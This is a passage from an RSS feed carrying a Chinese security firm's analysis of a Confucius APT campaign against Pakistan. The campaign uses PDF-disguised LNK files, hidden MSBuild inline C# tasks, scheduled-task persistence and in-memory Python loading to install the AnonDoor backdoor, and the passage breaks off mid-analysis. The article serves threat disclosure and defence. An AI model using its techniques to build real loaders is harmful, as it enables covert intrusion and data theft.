none;">3. </span><span style="font-variant: normal;text-transform: none;" leaf=""><a href="https://github.com/Comfy-Org/ComfyUI-Manager/security/advisories/GHSA-562r-8445-54r2" target="_blank">https://github.com/Comfy-Org/ComfyUI-Manager/security/advisories/GHSA-562r-8445-54r2</a></span></span></p><p style="text-align: justify;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;word-break: break-all;margin-bottom: 8px;margin-top: 8px;"><span mpa-font-style="mmvum0fp14ks" data-mpa-action-id="mmvummjdo51" data-pm-slice="0 0 []"><span style="font-variant: normal;text-transform: none;font-size: 15px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" leaf="" mpa-font-style="mmvut763152q">4. </span><span leaf="" mpa-font-style="mmvut76322l9" style="font-variant: normal;text-transform: none;font-size: 15px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><a href="https://github.com/seanlynch/srl-nodes" target="_blank">https://github.com/seanlynch/srl-nodes</a></span></span><o:page></o:page></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=1824d39d&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyMjk4NzExMA%3D%3D%26mid%3D2247508019%26idx%3D1%26sn%3Dd6d9df690f1943dae9e64a641b1c9a92">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 19 Mar 2026 15:34:00 +0800</pubDate>
    </item>
    <item>
      <title>Confucius组织针对巴基斯坦部署AnonDoor后门的攻击活动分析</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247507824&amp;idx=1&amp;sn=3427f455307e1b5e2e1fe6001ecbb8e7</link>
      <description>Confucius组织是一个具有长期针对南亚地区的APT组织，自2013年活跃至今，主要目的是窃取敏感信息。近期我们在日常威胁狩猎中观察到该组织持续发起新型攻击，采用多层“白加黑”利用技术，并结合Pyc功能模块内存加载恶意代码，用于隐蔽恶意行为。</description>
      <content:encoded><![CDATA[<p>原创 <span>高级威胁研究院</span> <span>2026-03-04 17:30</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=64ae45c3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FEmmib7pWXrXKeSQFKln31U4sJxn07fLb8Mt0WuYwm0FAtf8Y5eQWvdrH9qoEjkOKeRicOwAcBgemmTBlMbvTL1AUf85skmsg0SD0PM44ib1k70%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>Confucius组织是一个具有长期针对南亚地区的APT组织，自2013年活跃至今，主要目的是窃取敏感信息。近期我们在日常威胁狩猎中观察到该组织持续发起新型攻击，采用多层“白加黑”利用技术，并结合Pyc功能模块内存加载恶意代码，用于隐蔽恶意行为。</p>
  <div data-role="outer" label="edit by 135editor"><div data-tools="135编辑器" data-id="16"><div style="background-color: rgb(245, 245, 244);border-color: rgb(245, 245, 244);color: rgb(33, 33, 34);border-radius: 4px;font-size: 14px;letter-spacing: 1.5px;line-height: 1.75em;padding: 1em 0.8em;margin: 10px auto;" data-pm-slice="5 5 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-tools&#34;:&#34;135编辑器&#34;,&#34;data-id&#34;:&#34;16&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="text-indent: 28px;margin-bottom: 8px;margin-top: 8px;line-height: 1.6em;"><span style="line-height: 150%;font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="line-height: 150%;font-size: 17px;color: rgb(33, 33, 34);letter-spacing: 1.5px;text-indent: 28px;background-color: rgb(245, 245, 244);"><span leaf="">Confucius组织，又被称“魔罗桫”。</span><span leaf="">是一个具有长期针对南亚地区的APT组织，自2013年活跃至今，主要目的是窃取敏感信息。</span></span></span></p><p style="text-indent: 28px;margin-bottom: 8px;margin-top: 8px;line-height: 1.6em;"><span style="line-height: 150%;font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="line-height: 150%;font-size: 17px;color: rgb(33, 33, 34);letter-spacing: 1.5px;text-indent: 28px;background-color: rgb(245, 245, 244);"><span leaf="">近期我们在日常威胁狩猎中观察到该组织持续发起新型攻击，采用多层白加黑利用技术，并结合Pyc功能模块内存加载恶意代码，用于隐蔽恶意行为。这种攻击手法在国内的攻击活动中比较少见。鉴于此，我们将重点揭露该组织如何利用Python加载恶意组件的完整攻击流程，以帮助用户及时识别威胁并采取防护措施。</span></span></span></p></div></div></div><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf=""> 一、攻击活动分析 </span></span></strong></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong style="color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">1. </span><span leaf="">攻击流程分析</span></span></strong></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100024155" data-ratio="0.48911798396334477" data-w="873" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=2561f02a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXKjHe3Ct9FLzUp83u13noye8fQNuvFrzCtCVLQpQQqsRbWwzBAc8nGTSNxvbax5bolJy99PaajNEtU9q6UjJ6X1RkHPibCFWRho%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">Confucius组织通过投递恶意ZIP文件，诱导用户执行其中的LNK文件，该LNK文件执行后通过MSBuild.exe文件加载同目录下的XML配置文件，从而请求服务器下载二阶载荷白利用组件，并创建计划任务，二阶载荷白利用组件会继续下发三阶载荷，并且也会创建新计划通过python.exe加载pyc文件，最终连接C2服务器实现数据窃取。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong style="color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">2. </span><span leaf="">载荷分析</span></span></strong></span></p><p style="margin-bottom: 24px;margin-top: 24px;"><span style="color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">2.1）</span><span leaf="">原始载荷分析</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">本次捕获的原始载荷为一个压缩包文件。包内包含两个均伪装成PDF的文件：一个名为GSR_Requirements.pdf的LNK快捷方式与一个名为Specification.pdf的MSBuild项目文件，如下图所示。其中，MSBuild项目文件被恶意设置为隐藏属性。攻击者利用伪装成PDF的LNK文件诱骗用户点击，进而调用MSBuild加载隐藏的MSBuild项目文件，从而触发恶意代码执行流程。</span></span></p><p><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.055491329479768786" data-type="png" data-w="865" data-imgfileid="100024156" src="https://wechat2rss.xlab.app/img-proxy/?k=1c8fc955&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXKicIAlSibWo9arJqC6cibJWUfEbhssV8f7clhxCPoG8D2Rbtdicv903L0PJaDj0Feq9kvnJiah4XdXDeZu7jL1iaxpaULHr6vXJicuJQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100024157" data-ratio="0.09479768786127167" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=26593aa0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXLvBdF7uuqh8bI73PXTuWedF14BcekNAYSj99zaKz3FOkZibfD2k81STN1qic4KvPf1CCjQ75edInQnpGaqickZWnWDINCfgV2tRI%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.09710982658959537" data-type="png" data-w="865" data-imgfileid="100024158" src="https://wechat2rss.xlab.app/img-proxy/?k=a16390cc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXK7PkfywMapDDhY1hBneLdstUoj7FpxVXISmS2jfia1JUBGty3qkloHlIcoibYXuXFaBtj2VMJW7ibKmyW94dyh1VwiauVggLibInNo%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">恶意MSBuild项目文件利用MSBuild的“内联任务”（Inline Task）功能执行C<a class="wx_topic_link" topic-id="mm8xsz70-rgy8ot" style="color: #576B95 !important;" data-topic="1">#代码</a>，主要行为是从远程服务器下载恶意载荷，并通过Windows计划任务（schtasks）实现持久化运行和伪装执行。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">项目代码中定义了一个执行流程和两个自定义任务：Task A和Task B，自定义任务均使用CodeTaskFactory直接嵌入C<a class="wx_topic_link" topic-id="mm8xsz70-ck25iu" style="color: #576B95 !important;" data-topic="1">#代码</a>。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: bold;">Task A（</span></span><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-weight: bold;">下载与执行/持久化模块</span></span></span><span leaf=""><span textstyle="" style="font-weight: bold;">）：</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">该代码通过设置安全协议为TLS 1.2确保与C2服务器的安全通信，使用WebClient将远程文件下载至本地指定路径，并借助schtasks.exe通过计划任务执行该文件。根据参数A4的值选择执行模式：若A4为0，则创建一个计划于当日23:59运行的任务并立即强制触发，用于即时启动诱饵文件；若A4非零，则创建一个在当前时间基础上延迟A4分钟后执行的一次性任务，实现延迟持久化。整个过程通过设置CreateNoWindow=true和UseShellExecute=false静默运行，避免用户察觉。具体代码如下图：</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100024159" data-ratio="1.2562091503267974" data-w="765" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=1ca1b4b9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJ8NogibkC1iaM0UezkrfkzbWAKITmicjDGWicuEtbtKrfUvvrlfYs520icpIyH1gicxpM83ohLh68H6qiaV8bRZB8t3zrqYKFqPsLuS8%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: bold;">Task B（</span></span><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-weight: bold;">仅下载</span></span></span><span leaf=""><span textstyle="" style="font-weight: bold;">）:</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: bold;">功能: </span>负责从URL下载文件到本地，不执行，具体代码如下：</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100024160" data-ratio="0.7357320099255583" data-w="806" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=e5863fa5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXITSgMAvXDsFX9LeWq2giaLXpLkF0gn1HwmxKXTo92x1QSxWHt39jIMkn8nWfY3BEt6LWUXJ0YG9otxF59g5BIgy1icBMTcOiaS9s%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: bold;">执行流程（Target &#34;X&#34;）</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">Target Name=&#34;X&#34;是脚本的入口点，它按顺序执行了以下三个步骤，组成了完整的部署链，如下图所示：</span></span></p><p><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.11676300578034682" data-type="png" data-w="865" data-imgfileid="100024161" src="https://wechat2rss.xlab.app/img-proxy/?k=450ca6b8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJgibFbqwsuuKYevUu4iaOt3sgdHDCcF75RjEjajc006Ey7S9AgzhUXR832Aq2t8Fac7fk2eibRumQUymOw2OdSMBTfxGASm54Uo0%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: bold;">第一步：部署主程序（调用Task A）</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 